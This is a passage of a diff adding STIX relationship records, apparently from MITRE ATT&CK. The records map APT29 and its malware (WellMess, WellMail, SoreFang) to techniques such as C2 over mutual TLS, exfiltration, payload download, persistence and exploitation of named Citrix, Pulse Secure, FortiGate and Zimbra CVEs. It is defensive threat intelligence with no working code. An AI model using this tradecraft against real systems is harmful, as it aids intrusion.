"https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b", + "description": "CISA. (2020, July 16). MAR-10296782-2.v1 \u2013 WELLMESS. Retrieved September 24, 2020." + }, + { + "source_name": "NCSC APT29 July 2020", + "url": "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf", + "description": "National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020." + } + ], + "description": "[WellMess](https://attack.mitre.org/software/S0514) can communicate to C2 with mutual TLS where client and server mutually check certificates.(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)(Citation: CISA WellMess July 2020)(Citation: NCSC APT29 July 2020)", + "relationship_type": "uses", + "id": "relationship--69d3a1fc-f72f-4fd9-aa89-c6a471791421", + "type": "relationship", + "modified": "2020-09-29T18:54:16.252Z", + "created": "2020-09-29T16:08:22.641Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3a4197ae-ec63-4162-907b-9a073d1157e4", + "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "external_references": [ + { + "source_name": "PWC WellMess July 2020", + "url": "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html", + "description": "PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020." + }, + { + "source_name": "PWC WellMess C2 August 2020", + "url": "https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html", + "description": "PWC. (2020, August 17). WellMess malware: analysis of its Command and Control (C2) server. Retrieved September 29, 2020." + }, + { + "source_name": "CISA WellMess July 2020", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b", + "description": "CISA. (2020, July 16). MAR-10296782-2.v1 \u2013 WELLMESS. Retrieved September 24, 2020." + } + ], + "description": "[WellMess](https://attack.mitre.org/software/S0514) can decode and decrypt data received from C2.(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)(Citation: CISA WellMess July 2020)", + "relationship_type": "uses", + "id": "relationship--c958d98c-d3d9-40cf-9702-5d9cb2cdf719", + "type": "relationship", + "modified": "2020-09-29T17:39:46.451Z", + "created": "2020-09-29T16:08:22.643Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542", + "target_ref": "malware--3a4197ae-ec63-4162-907b-9a073d1157e4", + "external_references": [ + { + "source_name": "PWC WellMess July 2020", + "url": "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html", + "description": "PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020." + }, + { + "source_name": "PWC WellMess C2 August 2020", + "url": "https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html", + "description": "PWC. (2020, August 17). WellMess malware: analysis of its Command and Control (C2) server. Retrieved September 29, 2020." + }, + { + "source_name": "CISA WellMess July 2020", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b", + "description": "CISA. (2020, July 16). MAR-10296782-2.v1 \u2013 WELLMESS. Retrieved September 24, 2020." + }, + { + "source_name": "NCSC APT29 July 2020", + "url": "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf", + "description": "National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020." + } + ], + "description": "(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)(Citation: CISA WellMess July 2020)(Citation: NCSC APT29 July 2020)", + "relationship_type": "uses", + "id": "relationship--f72527b3-98cb-4df6-9c52-9faef40206a0", + "type": "relationship", + "modified": "2020-09-29T18:38:17.402Z", + "created": "2020-09-29T16:24:31.017Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542", + "target_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c", + "external_references": [ + { + "source_name": "NCSC APT29 July 2020", + "url": "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf", + "description": "National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020." + } + ], + "description": "[APT29](https://attack.mitre.org/groups/G0016) has exploited CVE-2019-19781 for Citrix, CVE-2019-11510 for Pulse Secure VPNs, CVE-2018-13379 for FortiGate VPNs, and CVE-2019-9670 in Zimbra software to gain access.(Citation: NCSC APT29 July 2020)", + "relationship_type": "uses", + "id": "relationship--bf0ff6f3-51a5-4718-af3f-8f75b1eb507c", + "type": "relationship", + "modified": "2020-10-09T15:22:58.203Z", + "created": "2020-09-29T18:38:16.995Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542", + "target_ref": "malware--959f3b19-2dc8-48d5-8942-c66813a5101a", + "external_references": [ + { + "source_name": "CISA WellMail July 2020", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c", + "description": "CISA. (2020, July 16). MAR-10296782-3.v1 \u2013 WELLMAIL. Retrieved September 29, 2020." + }, + { + "source_name": "NCSC APT29 July 2020", + "url": "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf", + "description": "National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020." + } + ], + "description": "(Citation: CISA WellMail July 2020)(Citation: NCSC APT29 July 2020)", + "relationship_type": "uses", + "id": "relationship--0465916e-9561-4518-b2fa-09be21bc04e1", + "type": "relationship", + "modified": "2020-09-29T18:41:32.760Z", + "created": "2020-09-29T18:40:02.430Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--959f3b19-2dc8-48d5-8942-c66813a5101a", + "target_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", + "external_references": [ + { + "source_name": "CISA WellMail July 2020", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c", + "description": "CISA. (2020, July 16). MAR-10296782-3.v1 \u2013 WELLMAIL. Retrieved September 29, 2020." + }, + { + "source_name": "NCSC APT29 July 2020", + "url": "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf", + "description": "National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020." + } + ], + "description": "[WellMail](https://attack.mitre.org/software/S0515) can use hard coded client and certificate authority certificates to communicate with C2 over mutual TLS.(Citation: CISA WellMail July 2020)(Citation: NCSC APT29 July 2020)", + "relationship_type": "uses", + "id": "relationship--ea8e9109-739f-485c-8d13-fb5ed6b2fdcd", + "type": "relationship", + "modified": "2020-09-30T15:07:31.159Z", + "created": "2020-09-29T19:16:57.927Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--959f3b19-2dc8-48d5-8942-c66813a5101a", + "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "external_references": [ + { + "source_name": "CISA WellMail July 2020", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c", + "description": "CISA. (2020, July 16). MAR-10296782-3.v1 \u2013 WELLMAIL. Retrieved September 29, 2020." + } + ], + "description": "[WellMail](https://attack.mitre.org/software/S0515) can exfiltrate files from the victim machine.(Citation: CISA WellMail July 2020)", + "relationship_type": "uses", + "id": "relationship--ecb7a35e-cc83-4b7d-9eb6-42d0bd7d5d9e", + "type": "relationship", + "modified": "2020-09-29T19:16:57.931Z", + "created": "2020-09-29T19:16:57.931Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--959f3b19-2dc8-48d5-8942-c66813a5101a", + "target_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", + "external_references": [ + { + "source_name": "CISA WellMail July 2020", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c", + "description": "CISA. (2020, July 16). MAR-10296782-3.v1 \u2013 WELLMAIL. Retrieved September 29, 2020." + } + ], + "description": "[WellMail](https://attack.mitre.org/software/S0515) can archive files on the compromised host.(Citation: CISA WellMail July 2020)", + "relationship_type": "uses", + "id": "relationship--423b6f97-96c5-47f3-aa9f-f27bf5cd1ba0", + "type": "relationship", + "modified": "2020-09-29T19:16:57.935Z", + "created": "2020-09-29T19:16:57.935Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--959f3b19-2dc8-48d5-8942-c66813a5101a", + "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "external_references": [ + { + "source_name": "CISA WellMail July 2020", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c", + "description": "CISA. (2020, July 16). MAR-10296782-3.v1 \u2013 WELLMAIL. Retrieved September 29, 2020." + } + ], + "description": "[WellMail](https://attack.mitre.org/software/S0515) can decompress scripts received from C2.(Citation: CISA WellMail July 2020)", + "relationship_type": "uses", + "id": "relationship--a511a41e-0ab0-4088-8617-5de975b5d9a8", + "type": "relationship", + "modified": "2020-09-29T19:16:57.936Z", + "created": "2020-09-29T19:16:57.936Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--959f3b19-2dc8-48d5-8942-c66813a5101a", + "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "external_references": [ + { + "source_name": "CISA WellMail July 2020", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c", + "description": "CISA. (2020, July 16). MAR-10296782-3.v1 \u2013 WELLMAIL. Retrieved September 29, 2020." + } + ], + "description": "[WellMail](https://attack.mitre.org/software/S0515) can receive data and executable scripts from C2.(Citation: CISA WellMail July 2020)", + "relationship_type": "uses", + "id": "relationship--05dc9f8c-a1ea-4cdf-ae86-e98af40d5bd7", + "type": "relationship", + "modified": "2020-09-29T19:16:57.938Z", + "created": "2020-09-29T19:16:57.938Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--959f3b19-2dc8-48d5-8942-c66813a5101a", + "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", + "external_references": [ + { + "source_name": "CISA WellMail July 2020", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c", + "description": "CISA. (2020, July 16). MAR-10296782-3.v1 \u2013 WELLMAIL. Retrieved September 29, 2020." + } + ], + "description": "[WellMail](https://attack.mitre.org/software/S0515) can identify the current username on the victim system.(Citation: CISA WellMail July 2020)", + "relationship_type": "uses", + "id": "relationship--731c3fa1-2af3-4b6e-ad0d-7942e8e966fb", + "type": "relationship", + "modified": "2020-09-29T19:16:57.963Z", + "created": "2020-09-29T19:16:57.963Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--959f3b19-2dc8-48d5-8942-c66813a5101a", + "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", + "external_references": [ + { + "source_name": "CISA WellMail July 2020", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c", + "description": "CISA. (2020, July 16). MAR-10296782-3.v1 \u2013 WELLMAIL. Retrieved September 29, 2020." + } + ], + "description": "[WellMail](https://attack.mitre.org/software/S0515) can identify the IP address of the victim system.(Citation: CISA WellMail July 2020)", + "relationship_type": "uses", + "id": "relationship--818d3d9c-0734-4e05-9ce2-1cf7c2edb5d5", + "type": "relationship", + "modified": "2020-09-29T19:16:57.967Z", + "created": "2020-09-29T19:16:57.967Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--e33e4603-afab-402d-b2a1-248d435b5fe0", + "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", + "external_references": [ + { + "source_name": "CISA SoreFang July 2016", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a", + "description": "CISA. (2020, July 16). MAR-10296782-1.v1 \u2013 SOREFANG. Retrieved September 29, 2020." + } + ], + "description": "[SoreFang](https://attack.mitre.org/software/S0516) can collect the TCP/IP, DNS, DHCP, and network adapter configuration on a compromised host via ipconfig.exe /all.(Citation: CISA SoreFang July 2016)", + "relationship_type": "uses", + "id": "relationship--9c24c5c3-0aa3-4caa-b983-9739eb8c57eb", + "type": "relationship", + "modified": "2020-09-30T14:13:38.350Z", + "created": "2020-09-30T13:48:26.353Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--e33e4603-afab-402d-b2a1-248d435b5fe0", + "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "external_references": [ + { + "source_name": "CISA SoreFang July 2016", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a", + "description": "CISA. (2020, July 16). MAR-10296782-1.v1 \u2013 SOREFANG. Retrieved September 29, 2020." + } + ], + "description": "[SoreFang](https://attack.mitre.org/software/S0516) can collect the hostname, operating system configuration, product ID, and disk space on victim machines by executing [Systeminfo](https://attack.mitre.org/software/S0096).(Citation: CISA SoreFang July 2016)", + "relationship_type": "uses", + "id": "relationship--75e01f6a-9f45-4db2-a79d-a21453b6d83f", + "type": "relationship", + "modified": "2020-09-30T14:13:38.333Z", + "created": "2020-09-30T13:48:26.368Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--e33e4603-afab-402d-b2a1-248d435b5fe0", + "target_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c", + "external_references": [ + { + "source_name": "CISA SoreFang July 2016", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a", + "description": "CISA. (2020, July 16). MAR-10296782-1.v1 \u2013 SOREFANG. Retrieved September 29, 2020." + } + ], + "description": "[SoreFang](https://attack.mitre.org/software/S0516) can gain access by exploiting a Sangfor SSL VPN vulnerability that allows for the placement and delivery of malicious update binaries.(Citation: CISA SoreFang July 2016)", + "relationship_type": "uses", + "id": "relationship--61ee8aa7-89fc-4414-97f3-95fa9f1f26ad", + "type": "relationship", + "modified": "2020-09-30T14:13:38.379Z", + "created": "2020-09-30T13:48:26.377Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--e33e4603-afab-402d-b2a1-248d435b5fe0", + "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", + "external_references": [ + { + "source_name": "CISA SoreFang July 2016", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a", + "description": "CISA. (2020, July 16). MAR-10296782-1.v1 \u2013 SOREFANG. Retrieved September 29, 2020." + } + ], + "description": "[SoreFang](https://attack.mitre.org/software/S0516) has the ability to list directories.(Citation: CISA SoreFang July 2016)", + "relationship_type": "uses", + "id": "relationship--3dd2f874-57e3-4670-9c0a-7d8c35741bb6", + "type": "relationship", + "modified": "2020-09-30T14:13:38.315Z", + "created": "2020-09-30T14:13:38.315Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--e33e4603-afab-402d-b2a1-248d435b5fe0", + "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "external_references": [ + { + "source_name": "CISA SoreFang July 2016", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a", + "description": "CISA. (2020, July 16). MAR-10296782-1.v1 \u2013 SOREFANG. Retrieved September 29, 2020." + } + ], + "description": "[SoreFang](https://attack.mitre.org/software/S0516) can enumerate processes on a victim machine through use of [Tasklist](https://attack.mitre.org/software/S0057).(Citation: CISA SoreFang July 2016)", + "relationship_type": "uses", + "id": "relationship--1ed17f60-d6ca-4ef7-ae52-7a573c2a7ff3", + "type": "relationship", + "modified": "2020-09-30T14:13:38.320Z", + "created": "2020-09-30T14:13:38.320Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--e33e4603-afab-402d-b2a1-248d435b5fe0", + "target_ref": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "external_references": [ + { + "source_name": "CISA SoreFang July 2016", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a", + "description": "CISA. (2020, July 16). MAR-10296782-1.v1 \u2013 SOREFANG. Retrieved September 29, 2020." + } + ], + "description": "[SoreFang](https://attack.mitre.org/software/S0516) can enumerate domain groups by executing net.exe group /domain.(Citation: CISA SoreFang July 2016)", + "relationship_type": "uses", + "id": "relationship--98737ffe-6b7b-4c2d-a775-7a93e304a9c7", + "type": "relationship", + "modified": "2020-10-06T16:10:42.699Z", + "created": "2020-09-30T14:13:38.337Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--e33e4603-afab-402d-b2a1-248d435b5fe0", + "target_ref": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e", + "external_references": [ + { + "source_name": "CISA SoreFang July 2016", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a", + "description": "CISA. (2020, July 16). MAR-10296782-1.v1 \u2013 SOREFANG. Retrieved September 29, 2020." + } + ], + "description": "[SoreFang](https://attack.mitre.org/software/S0516) can collect usernames from the local system via net.exe user.(Citation: CISA SoreFang July 2016)", + "relationship_type": "uses", + "id": "relationship--962d745e-7771-4c8b-a887-04d3a521943c", + "type": "relationship", + "modified": "2020-10-06T16:10:42.741Z", + "created": "2020-09-30T14:13:38.339Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--e33e4603-afab-402d-b2a1-248d435b5fe0", + "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "external_references": [ + { + "source_name": "CISA SoreFang July 2016", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a", + "description": "CISA. (2020, July 16). MAR-10296782-1.v1 \u2013 SOREFANG. Retrieved September 29, 2020." + } + ], + "description": "[SoreFang](https://attack.mitre.org/software/S0516) can gain persistence through use of scheduled tasks.(Citation: CISA SoreFang July 2016)", + "relationship_type": "uses", + "id": "relationship--6beb1553-aece-41eb-a1e7-dbe2738f23d6", + "type": "relationship", + "modified": "2020-09-30T14:23:17.134Z", + "created": "2020-09-30T14:23:17.134Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--e33e4603-afab-402d-b2a1-248d435b5fe0", + "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "external_references": [ + { + "source_name": "CISA SoreFang July 2016", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a", + "description": "CISA. (2020, July 16). MAR-10296782-1.v1 \u2013 SOREFANG. Retrieved September 29, 2020." + } + ], + "description": "[SoreFang](https://attack.mitre.org/software/S0516) can decode and decrypt exfiltrated data sent to C2.(Citation: CISA SoreFang July 2016)", + "relationship_type": "uses", + "id": "relationship--ec218695-e481-4895-97a2-5383949cb04d", + "type": "relationship", + "modified": "2020-09-30T14:23:17.147Z", + "created": "2020-09-30T14:23:17.147Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--e33e4603-afab-402d-b2a1-248d435b5fe0", + "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "external_references": [ + { + "source_name": "CISA SoreFang July 2016", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a", + "description": "CISA. (2020, July 16). MAR-10296782-1.v1 \u2013 SOREFANG. Retrieved September 29, 2020." + }, + { + "source_name": "NCSC APT29 July 2020", + "url": "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf", + "description": "National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020." + } + ], + "description": "[SoreFang](https://attack.mitre.org/software/S0516) can download additional payloads from C2.(Citation: CISA SoreFang July 2016)(Citation: NCSC APT29 July 2020)", + "relationship_type": "uses", + "id": "relationship--0aebf9e4-9730-45ce-877d-f78432c13fad", + "type": "relationship", + "modified": "2020-09-30T14:24:43.017Z", + "created": "2020-09-30T14:23:17.187Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--e33e4603-afab-402d-b2a1-248d435b5fe0", + "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "external_references": [ + { + "source_name": "CISA SoreFang July 2016", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a", + "description": "CISA. (2020, July 16). MAR-10296782-1.v1 \u2013 SOREFANG. Retrieved September 29, 2020." + }, + { + "source_name": "NCSC APT29 July 2020", + "url": "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf", + "description": "National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020." + } + ], + "description": "[SoreFang](https://attack.mitre.org/software/S0516) can use HTTP in C2 communications.(Citation: CISA SoreFang July 2016)(Citation: NCSC APT29 July 2020)", + "relationship_type": "uses", + "id": "relationship--4b9cbe06-8c1f-4596-ad87-fa19e60e8ec3", + "type": "relationship", + "modified": "2020-09-30T14:24:43.019Z", + "created": "2020-09-30T14:23:17.192Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--e33e4603-afab-402d-b2a1-248d435b5fe0", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "external_references": [ + { + "source_name": "CISA SoreFang July 2016", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a", + "description": "CISA. (2020, July 16). MAR-10296782-1.v1 \u2013 SOREFANG. Retrieved September 29, 2020." + } + ], + "description": "[SoreFang](https://attack.mitre.org/software/S0516) has the ability to encode and RC6 encrypt data sent to C2.(Citation: CISA SoreFang July 2016)", + "relationship_type": "uses", + "id": "relationship--c76875e8-006d-493b-880a-332faf28f3ca", + "type": "relationship", + "modified": "2020-09-30T14:23:17.197Z", + "created": "2020-09-30T14:23:17.197Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542", + "target_ref": "tool--2e45723a-31da-4a7e-aaa6-e01998a6788f", + "external_references": [ + { + "source_name": "CISA SoreFang July 2016", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a", + "description": "CISA. (2020, July 16). MAR-10296782-1.v1 \u2013 SOREFANG. Retrieved September 29, 2020." + } + ], + "description": "(Citation: CISA SoreFang July 2016)", + "relationship_type": "uses", + "id": "relationship--13cd473c-1953-45d2-8508-faf8c1b6a941", + "type": "relationship", + "modified": "2020-09-30T14:29:28.417Z", + "created": "2020-09-30T14:29:28.417Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542", + "target_ref": "tool--7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1", + "external_references": [ + { + "source_name": "CISA SoreFang July 2016", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a", + "description": "CISA. (2020, July 16). MAR-10296782-1.v1 \u2013 SOREFANG. Retrieved September 29, 2020." + } + ], + "description": "(Citation: CISA SoreFang July 2016)", + "relationship_type": "uses", + "id": "relationship--c8a02e92-6b53-4c1f-ae1f-bebedd6bedc7", + "type": "relationship", + "modified": "2020-09-30T14:29:28.442Z", + "created": "2020-09-30T14:29:28.442Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542", + "target_ref": "tool--294e2560-bd48-44b2-9da2-833b5588ad11", + "external_references": [ + { + "source_name": "CISA SoreFang July 2016", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a", + "description": "CISA. (2020, July 16). MAR-10296782-1.v1 \u2013 SOREFANG. Retrieved September 29, 2020." + } + ], + "description": "(Citation: CISA SoreFang July 2016)", + "relationship_type": "uses", + "id": "relationship--cb1dab47-1a8e-431c-adc9-51d341ce435e", + "type": "relationship", + "modified": "2020-09-30T14:29:28.450Z", + "created": "2020-09-30T14:29:28.450Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542", + "target_ref": "tool--03342581-f790-4f03-ba41-e82e67392e23", + "external_references": [ + { + "source_name": "CISA SoreFang July 2016", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a", + "description": "CISA. (2020, July 16). MAR-10296782-1.v1 \u2013 SOREFANG. Retrieved September 29, 2020." + } + ], + "description": "(Citation: CISA SoreFang July 2016)", + "relationship_type": "uses", + "id": "relationship--db80dd29-d335-48b9-853e-5f15e576acb3", + "type": "relationship", + "modified": "2020-09-30T14:29:28.424Z", + "created": "2020-09-30T14:29:28.424Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542", + "target_ref": "malware--e33e4603-afab-402d-b2a1-248d435b5fe0", + "external_references": [ + { + "source_name": "NCSC APT29 July 2020", + "url": "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf", + "description": "National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020." + }, + { + "source_name": "CISA SoreFang July 2016", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a", + "description": "CISA. (2020, July 16). MAR-10296782-1.v1 \u2013 SOREFANG. Retrieved September 29, 2020." + } + ], + "description": "(Citation: NCSC APT29 July 2020)(Citation: CISA SoreFang July 2016)", + "relationship_type": "uses", + "id": 